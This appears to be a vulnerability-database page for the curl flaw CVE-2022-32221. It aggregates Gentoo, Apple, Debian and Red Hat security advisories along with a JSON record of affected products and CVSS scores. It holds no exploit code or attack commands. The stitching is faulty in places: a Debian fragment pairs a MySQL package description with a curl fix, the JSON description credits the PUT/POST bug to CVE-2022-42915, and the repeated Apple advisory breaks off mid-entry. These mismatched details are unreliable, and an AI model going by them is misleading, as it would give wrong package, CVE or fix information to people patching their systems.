Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2023-01-23-4 macOS Ventura 13.2
macOS Ventura 13.2 addresses the following issues. Information about the security content is also available at https://support.apple.com/HT213605.
AppleMobileFileIntegrity Available for: macOS Ventura Impact: An app may be able to access user-sensitive data Description: This issue was addressed by enabling hardened runtime. CVE-2023-23499: Wojciech Reguła (@_r3ggi) of SecuRing (wojciechregula.blog)
curl Available for: macOS Ventura Impact: Multiple issues in curl Description: Multiple issues were addressed by updating to curl version 7.86.0. CVE-2022-42915 CVE-2022-42916 CVE-2022-32221 CVE-2022-35260
dcerpc Available for: macOS Ventura Impact: Mounting a maliciously crafted Samba network share may lead to arbitrary code execution Description: A buffer overflow issue was addressed with improved memory handling. CVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco Talos
DiskArbitration Available for: macOS Ventura Impact: An encrypted volume may be unmounted and remounted by a different user without prompting for the password Description: A logic issue was addressed with improved state management. CVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)
ImageIO Available for: macOS Ventura Impact: Processing an image may lead to a denial-of-service Description: A memory corruption issue was addressed with improved state management. CVE-2023-23519: Yiğit Can YILMAZ (@yilmazcanyigit)
Intel Graphics Driver Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved bounds checks. CVE-2023-23507: an anonymous researcher
Kernel Available for: macOS Ventura Impact: An app may be able to leak sensitive kernel state Description: The issue was addressed with improved memory handling. CVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Kernel Available for: macOS Ventura Impact: An app may be able to determine kernel memory layout Description: An information disclosure issue was addressed by removing the vulnerable code. CVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Kernel Available for: macOS Ventura Impact: An app may be able to execute arbitrary code with kernel privileges Description: The issue was addressed with improved memory handling. CVE-2023-23504: Adam Doupé of ASU SEFCOM
libxpc Available for: macOS Ventura Impact: An app may be able to access user-sensitive data Description: A permissions issue was addressed with improved validation. CVE-2023-23506: Guilherme Rambo of Best Buddy Apps (rambo.codes)
Mail Drafts Available for: macOS Ventura Impact: The quoted original message may be selected from the wrong email when forwarding an email from an Exchange account Description: A logic issue was addressed with improved state management. CVE-2023-23498: an anonymous researcher
Maps Available for: macOS Ventura Impact: An app may be able to bypass Privacy preferences Description: A logic issue was addressed with improved state management. CVE-2023-23503: an anonymous researcher
PackageKit Available for: macOS Ventura Impact: An app may be able to gain root privileges Description: A logic issue was addressed with improved state management. CVE-2023-23497: Mickey Jin (@patch1t)
Safari Available for: macOS Ventura Impact: An app may be able to access a user’s Safari history Description: A permissions issue was addressed with improved validation. CVE-2023-23510: Guilherme Rambo of Best Buddy Apps (rambo.codes)
Safari Available for: macOS Ventura Impact: Visiting a website may lead to an app denial-of-service Description: The issue was addressed with improved handling of caches. CVE-2023-23512: Adriatik Raci
Screen Time Available for: macOS Ventura Impact: An app may be able to access information about a user’s contacts Description: A privacy issue was addressed with improved private data redaction for log entries. CVE-2023-23505: Wojciech Reguła of SecuRing (wojciechregula.blog)
Vim Available for: macOS Ventura Impact: Multiple issues in Vim Description: A use after free issue was addressed with improved memory management. CVE-2022-3705
Weather Available for: macOS Ventura Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an anonymous researcher
WebKit Available for: macOS Ventura Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: The issue was addressed with improved checks. WebKit Bugzilla: 245464 CVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming Wang, JiKai Ren and Hang Shu of Institute of Computing Technology, Chinese Academy of Sciences
WebKit Available for: macOS Ventura Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: The issue was addressed with improved memory handling. WebKit Bugzilla: 248268 CVE-2023-23518: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE WebKit Bugzilla: 248268 CVE-2023-23517: YeongHyeon Choi (@hyeon101010), Hyeon Park (@tree_segment), SeOk JEON (@_seokjeon), YoungSung Ahn (@_ZeroSung), JunSeo Bae (@snakebjs0107), Dohyun Lee (@l33d0hyun) of Team ApplePIE
Wi-Fi Available for: macOS Ventura Impact: An app may be able to disclose kernel memory Description: The issue was addressed with improved memory handling. CVE-2023-23501: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd. (@starlabs_sg)
Windows Installer Available for: macOS Ventura Impact: An app may be able to bypass Privacy preferences Description: The issue was addressed with improved memory handling. CVE-2023-23508: Mickey Jin (@patch1t)
Additional recognition
Bluetooth We would like to acknowledge an anonymous researcher for their assistance.
Kernel We would like to acknowledge Nick Stenning of Replicate for their assistance.
Shortcuts We would like to acknowledge Baibhav Anand Jha from ReconWithMe and Cristian Dinca of Tudor Vianu National High School of Computer Science, Romania for their assistance.
WebKit We would like to acknowledge Eliya Stein of Confiant for their assistance.
macOS Ventura 13.2 may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/ All information is also posted on the Apple Security Updates web site: https://support.apple.com/en-us/HT201222.
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmPPIl8ACgkQ4RjMIDke Nxnt7RAA2a0c/Ij93MfR8eiNMkIHVnr+wL+4rckVmHvs85dSHNBqQ8+kYpAs2tEk 7CVZoxAGg8LqVa6ZmBbAp5ZJGi2nV8LjOYzaWw/66d648QC2upTWJ93sWmZ7LlLb m9pcLfBsdAFPmVa8VJO0fxJGkxsCP0cQiBl+f9R4ObZBBiScbHUckSmHa6Qn/Q2U VsnHnJznAlDHMXiaV3O1zKBeahkqSx/IfO04qmk8oMWh89hI53S551Z3NEx63zgd Cx8JENj2NpFlgmZ0w0Tz5ZZ3LT4Ok28ns8N762JLE2nbTfEl7rM+bjUfWg4yJ1Rp TCEelbLKfUjlrh2N1fe0XWBs9br/069QlhTBBVd/qAbUBxkS/UOlWk3Vp+TI0bkK rrXouRijzRmBBK93jfWxhyd27avqQHmc04ofjY/lNYOCcGMrr813cGKNs90aRfcg joKeC51mYJnlTyMB0nDcJx3b5+MN+Ij7Sa04B9dbH162YFxp4LsaavmR0MooN1T9 3XrXEQ71a3pvdoF1ffW9Mz7vaqhBkffnzQwWU5zY2RwDTjFyHdNyI/1JkVzYmAxq QR4uA5gCDYYk/3rzlrVot+ezHX525clTHsvEYhIfu+i1HCxqdpvfaHbn2m+i1QtU /Lzz2mySt3y0akZ2rHwPfBZ8UFfvaauyhZ3EhSP3ikGs9DOsv1w= =pcJ4 -----END PGP SIGNATURE-----
.
Software Description: - mysql-8.0: MySQL database - mysql-5.7: MySQL database
Details:
Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues.
In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes. In general, a standard system update will make all the necessary changes.
For the stable distribution (bullseye), these problems have been fixed in version 7.74.0-1.3+deb11u5. This update also revises the fix for CVE-2022-27774 released in DSA-5197-1.
We recommend that you upgrade your curl packages. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: curl security update Advisory ID: RHSA-2023:4139-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2023:4139 Issue date: 2023-07-18 CVE Names: CVE-2022-32221 CVE-2023-23916 =====================================================================
- Summary:
An update for curl is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64
- Description:
The curl packages provide the libcurl library and the curl utility for downloading files from servers using various protocols, including HTTP, FTP, and LDAP.
Security Fix(es):
-
curl: POST following PUT confusion (CVE-2022-32221)
-
curl: HTTP multi-header compression denial of service (CVE-2023-23916)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2135411 - CVE-2022-32221 curl: POST following PUT confusion 2167815 - CVE-2023-23916 curl: HTTP multi-header compression denial of service
- Package List:
Red Hat Enterprise Linux AppStream EUS (v.9.0):
aarch64: curl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm curl-debugsource-7.76.1-14.el9_0.6.aarch64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm libcurl-devel-7.76.1-14.el9_0.6.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm
ppc64le: curl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm curl-debugsource-7.76.1-14.el9_0.6.ppc64le.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-devel-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm
s390x: curl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm curl-debugsource-7.76.1-14.el9_0.6.s390x.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm libcurl-devel-7.76.1-14.el9_0.6.s390x.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm
x86_64: curl-debuginfo-7.76.1-14.el9_0.6.i686.rpm curl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm curl-debugsource-7.76.1-14.el9_0.6.i686.rpm curl-debugsource-7.76.1-14.el9_0.6.x86_64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm libcurl-devel-7.76.1-14.el9_0.6.i686.rpm libcurl-devel-7.76.1-14.el9_0.6.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm
Red Hat Enterprise Linux BaseOS EUS (v.9.0):
Source: curl-7.76.1-14.el9_0.6.src.rpm
aarch64: curl-7.76.1-14.el9_0.6.aarch64.rpm curl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm curl-debugsource-7.76.1-14.el9_0.6.aarch64.rpm curl-minimal-7.76.1-14.el9_0.6.aarch64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm libcurl-7.76.1-14.el9_0.6.aarch64.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm libcurl-minimal-7.76.1-14.el9_0.6.aarch64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.aarch64.rpm
ppc64le: curl-7.76.1-14.el9_0.6.ppc64le.rpm curl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm curl-debugsource-7.76.1-14.el9_0.6.ppc64le.rpm curl-minimal-7.76.1-14.el9_0.6.ppc64le.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-minimal-7.76.1-14.el9_0.6.ppc64le.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.ppc64le.rpm
s390x: curl-7.76.1-14.el9_0.6.s390x.rpm curl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm curl-debugsource-7.76.1-14.el9_0.6.s390x.rpm curl-minimal-7.76.1-14.el9_0.6.s390x.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm libcurl-7.76.1-14.el9_0.6.s390x.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.s390x.rpm libcurl-minimal-7.76.1-14.el9_0.6.s390x.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.s390x.rpm
x86_64: curl-7.76.1-14.el9_0.6.x86_64.rpm curl-debuginfo-7.76.1-14.el9_0.6.i686.rpm curl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm curl-debugsource-7.76.1-14.el9_0.6.i686.rpm curl-debugsource-7.76.1-14.el9_0.6.x86_64.rpm curl-minimal-7.76.1-14.el9_0.6.x86_64.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm curl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm libcurl-7.76.1-14.el9_0.6.i686.rpm libcurl-7.76.1-14.el9_0.6.x86_64.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.i686.rpm libcurl-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm libcurl-minimal-7.76.1-14.el9_0.6.i686.rpm libcurl-minimal-7.76.1-14.el9_0.6.x86_64.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.i686.rpm libcurl-minimal-debuginfo-7.76.1-14.el9_0.6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2022-32221 https://access.redhat.com/security/cve/CVE-2023-23916 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2023 Red Hat, Inc
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "11.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.12"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "curl",
"scope": "lt",
"trust": 1.0,
"vendor": "haxx",
"version": "7.86.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "8.2.0"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "macos",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "12.6.3"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "universal forwarder",
"scope": "gte",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.0"
},
{
"_id": null,
"model": "clustered data ontap",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
},
"credits": {
"_id": null,
"data": "Ubuntu",
"sources": [
{
"db": "PACKETSTORM",
"id": "169538"
},
{
"db": "PACKETSTORM",
"id": "169535"
},
{
"db": "PACKETSTORM",
"id": "170729"
}
],
"trust": 0.3
},
"cve": "CVE-2022-32221",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2022-32221",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-32221",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2022-32221",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-2214",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-2214"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
},
{
"db": "NVD",
"id": "CVE-2022-32221"
}
]
},
"description": {
"_id": null,
"data": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously was used to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent `POST` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST. (CVE-2022-42915). ==========================================================================\nUbuntu Security Notice USN-5702-1\nOctober 26, 2022\n\ncurl vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.10\n- Ubuntu 22.04 LTS\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in curl. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nRobby Simpson discovered that curl incorrectly handled certain POST\noperations after PUT operations. \n(CVE-2022-32221)\n\nHiroki Kurosawa discovered that curl incorrectly handled parsing .netrc\nfiles. If an attacker were able to provide a specially crafted .netrc file,\nthis issue could cause curl to crash, resulting in a denial of service. \nThis issue only affected Ubuntu 22.10. (CVE-2022-35260)\n\nIt was discovered that curl incorrectly handled certain HTTP proxy return\ncodes. A remote attacker could use this issue to cause curl to crash,\nresulting in a denial of service, or possibly execute arbitrary code. This\nissue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2022-42915)\n\nHiroki Kurosawa discovered that curl incorrectly handled HSTS support\nwhen certain hostnames included IDN characters. A remote attacker could\npossibly use this issue to cause curl to use unencrypted connections. This\nissue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2022-42916)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.10:\n curl 7.85.0-1ubuntu0.1\n libcurl3-gnutls 7.85.0-1ubuntu0.1\n libcurl3-nss 7.85.0-1ubuntu0.1\n libcurl4 7.85.0-1ubuntu0.1\n\nUbuntu 22.04 LTS:\n curl 7.81.0-1ubuntu1.6\n libcurl3-gnutls 7.81.0-1ubuntu1.6\n libcurl3-nss 7.81.0-1ubuntu1.6\n libcurl4 7.81.0-1ubuntu1.6\n\nUbuntu 20.04 LTS:\n curl 7.68.0-1ubuntu2.14\n libcurl3-gnutls 7.68.0-1ubuntu2.14\n libcurl3-nss 7.68.0-1ubuntu2.14\n libcurl4 7.68.0-1ubuntu2.14\n\nUbuntu 18.04 LTS:\n curl 7.58.0-2ubuntu3.21\n libcurl3-gnutls 7.58.0-2ubuntu3.21\n libcurl3-nss 7.58.0-2ubuntu3.21\n libcurl4 7.58.0-2ubuntu3.21\n\nIn general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 202212-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: High\n Title: curl: Multiple Vulnerabilities\n Date: December 19, 2022\n Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365\n ID: 202212-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n=======\nMultiple vulnerabilities have been found in curl, the worst of which\ncould result in arbitrary code execution. \n\nBackground\n=========\nA command line tool and library for transferring data with URLs. \n\nAffected packages\n================\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/curl \u003c 7.86.0 \u003e= 7.86.0\n\nDescription\n==========\nMultiple vulnerabilities have been discovered in curl. Please review the\nCVE identifiers referenced below for details. \n\nImpact\n=====\nPlease review the referenced CVE identifiers for details. \n\nWorkaround\n=========\nThere is no known workaround at this time. \n\nResolution\n=========\nAll curl users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/curl-7.86.0\"\n\nReferences\n=========\n[ 1 ] CVE-2021-22922\n https://nvd.nist.gov/vuln/detail/CVE-2021-22922\n[ 2 ] CVE-2021-22923\n https://nvd.nist.gov/vuln/detail/CVE-2021-22923\n[ 3 ] CVE-2021-22925\n https://nvd.nist.gov/vuln/detail/CVE-2021-22925\n[ 4 ] CVE-2021-22926\n https://nvd.nist.gov/vuln/detail/CVE-2021-22926\n[ 5 ] CVE-2021-22945\n https://nvd.nist.gov/vuln/detail/CVE-2021-22945\n[ 6 ] CVE-2021-22946\n https://nvd.nist.gov/vuln/detail/CVE-2021-22946\n[ 7 ] CVE-2021-22947\n https://nvd.nist.gov/vuln/detail/CVE-2021-22947\n[ 8 ] CVE-2022-22576\n https://nvd.nist.gov/vuln/detail/CVE-2022-22576\n[ 9 ] CVE-2022-27774\n https://nvd.nist.gov/vuln/detail/CVE-2022-27774\n[ 10 ] CVE-2022-27775\n https://nvd.nist.gov/vuln/detail/CVE-2022-27775\n[ 11 ] CVE-2022-27776\n https://nvd.nist.gov/vuln/detail/CVE-2022-27776\n[ 12 ] CVE-2022-27779\n https://nvd.nist.gov/vuln/detail/CVE-2022-27779\n[ 13 ] CVE-2022-27780\n https://nvd.nist.gov/vuln/detail/CVE-2022-27780\n[ 14 ] CVE-2022-27781\n https://nvd.nist.gov/vuln/detail/CVE-2022-27781\n[ 15 ] CVE-2022-27782\n https://nvd.nist.gov/vuln/detail/CVE-2022-27782\n[ 16 ] CVE-2022-30115\n https://nvd.nist.gov/vuln/detail/CVE-2022-30115\n[ 17 ] CVE-2022-32205\n https://nvd.nist.gov/vuln/detail/CVE-2022-32205\n[ 18 ] CVE-2022-32206\n https://nvd.nist.gov/vuln/detail/CVE-2022-32206\n[ 19 ] CVE-2022-32207\n https://nvd.nist.gov/vuln/detail/CVE-2022-32207\n[ 20 ] CVE-2022-32208\n https://nvd.nist.gov/vuln/detail/CVE-2022-32208\n[ 21 ] CVE-2022-32221\n https://nvd.nist.gov/vuln/detail/CVE-2022-32221\n[ 22 ] CVE-2022-35252\n https://nvd.nist.gov/vuln/detail/CVE-2022-35252\n[ 23 ] CVE-2022-35260\n https://nvd.nist.gov/vuln/detail/CVE-2022-35260\n[ 24 ] CVE-2022-42915\n https://nvd.nist.gov/vuln/detail/CVE-2022-42915\n[ 25 ] CVE-2022-42916\n https://nvd.nist.gov/vuln/detail/CVE-2022-42916\n\nAvailability\n===========\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202212-01\n\nConcerns?\n========\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n======\nCopyright 2022 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2023-01-23-4 macOS Ventura 13.2\n\nmacOS Ventura 13.2 addresses the following issues. \nInformation about the security content is also available at\nhttps://support.apple.com/HT213605. \n\nAppleMobileFileIntegrity\nAvailable for: macOS Ventura\nImpact: An app may be able to access user-sensitive data\nDescription: This issue was addressed by enabling hardened runtime. \nCVE-2023-23499: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n(wojciechregula.blog)\n\ncurl\nAvailable for: macOS Ventura\nImpact: Multiple issues in curl\nDescription: Multiple issues were addressed by updating to curl\nversion 7.86.0. \nCVE-2022-42915\nCVE-2022-42916\nCVE-2022-32221\nCVE-2022-35260\n\ndcerpc\nAvailable for: macOS Ventura\nImpact: Mounting a maliciously crafted Samba network share may lead\nto arbitrary code execution\nDescription: A buffer overflow issue was addressed with improved\nmemory handling. \nCVE-2023-23513: Dimitrios Tatsis and Aleksandar Nikolic of Cisco\nTalos\n\nDiskArbitration\nAvailable for: macOS Ventura\nImpact: An encrypted volume may be unmounted and remounted by a\ndifferent user without prompting for the password\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23493: Oliver Norpoth (@norpoth) of KLIXX GmbH (klixx.com)\n\nImageIO\nAvailable for: macOS Ventura\nImpact: Processing an image may lead to a denial-of-service\nDescription: A memory corruption issue was addressed with improved\nstate management. \nCVE-2023-23519: Yi\u011fit Can YILMAZ (@yilmazcanyigit)\n\nIntel Graphics Driver\nAvailable for: macOS Ventura\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved bounds checks. \nCVE-2023-23507: an anonymous researcher\n\nKernel\nAvailable for: macOS Ventura\nImpact: An app may be able to leak sensitive kernel state\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23500: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. \nLtd. (@starlabs_sg)\n\nKernel\nAvailable for: macOS Ventura\nImpact: An app may be able to determine kernel memory layout\nDescription: An information disclosure issue was addressed by\nremoving the vulnerable code. \nCVE-2023-23502: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. \nLtd. (@starlabs_sg)\n\nKernel\nAvailable for: macOS Ventura\nImpact: An app may be able to execute arbitrary code with kernel\nprivileges\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23504: Adam Doup\u00e9 of ASU SEFCOM\n\nlibxpc\nAvailable for: macOS Ventura\nImpact: An app may be able to access user-sensitive data\nDescription: A permissions issue was addressed with improved\nvalidation. \nCVE-2023-23506: Guilherme Rambo of Best Buddy Apps (rambo.codes)\n\nMail Drafts\nAvailable for: macOS Ventura\nImpact: The quoted original message may be selected from the wrong\nemail when forwarding an email from an Exchange account\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23498: an anonymous researcher\n\nMaps\nAvailable for: macOS Ventura\nImpact: An app may be able to bypass Privacy preferences\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23503: an anonymous researcher\n\nPackageKit\nAvailable for: macOS Ventura\nImpact: An app may be able to gain root privileges\nDescription: A logic issue was addressed with improved state\nmanagement. \nCVE-2023-23497: Mickey Jin (@patch1t)\n\nSafari\nAvailable for: macOS Ventura\nImpact: An app may be able to access a user\u2019s Safari history\nDescription: A permissions issue was addressed with improved\nvalidation. \nCVE-2023-23510: Guilherme Rambo of Best Buddy Apps (rambo.codes)\n\nSafari\nAvailable for: macOS Ventura\nImpact: Visiting a website may lead to an app denial-of-service\nDescription: The issue was addressed with improved handling of\ncaches. \nCVE-2023-23512: Adriatik Raci\n\nScreen Time\nAvailable for: macOS Ventura\nImpact: An app may be able to access information about a user\u2019s\ncontacts\nDescription: A privacy issue was addressed with improved private data\nredaction for log entries. \nCVE-2023-23505: Wojciech Regu\u0142a of SecuRing (wojciechregula.blog)\n\nVim\nAvailable for: macOS Ventura\nImpact: Multiple issues in Vim\nDescription: A use after free issue was addressed with improved\nmemory management. \nCVE-2022-3705\n\nWeather\nAvailable for: macOS Ventura\nImpact: An app may be able to bypass Privacy preferences\nDescription: The issue was addressed with improved memory handling. \nCVE-2023-23511: Wojciech Regula of SecuRing (wojciechregula.blog), an\nanonymous researcher\n\nWebKit\nAvailable for: macOS Ventura\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: The issue was addressed with improved checks. \nWebKit Bugzilla: 245464\nCVE-2023-23496: ChengGang Wu, Yan Kang, YuHao Hu, Yue Sun, Jiming\nWang, JiKai Ren and Hang Shu of Institute of Computing Technology,\nChinese Academy of Sciences\n\nWebKit\nAvailable for: macOS Ventura\nImpact: Processing maliciously crafted web content may lead to\narbitrary code execution\nDescription: The issue was addressed with improved memory handling. \nWebKit Bugzilla: 248268\nCVE-2023-23518: 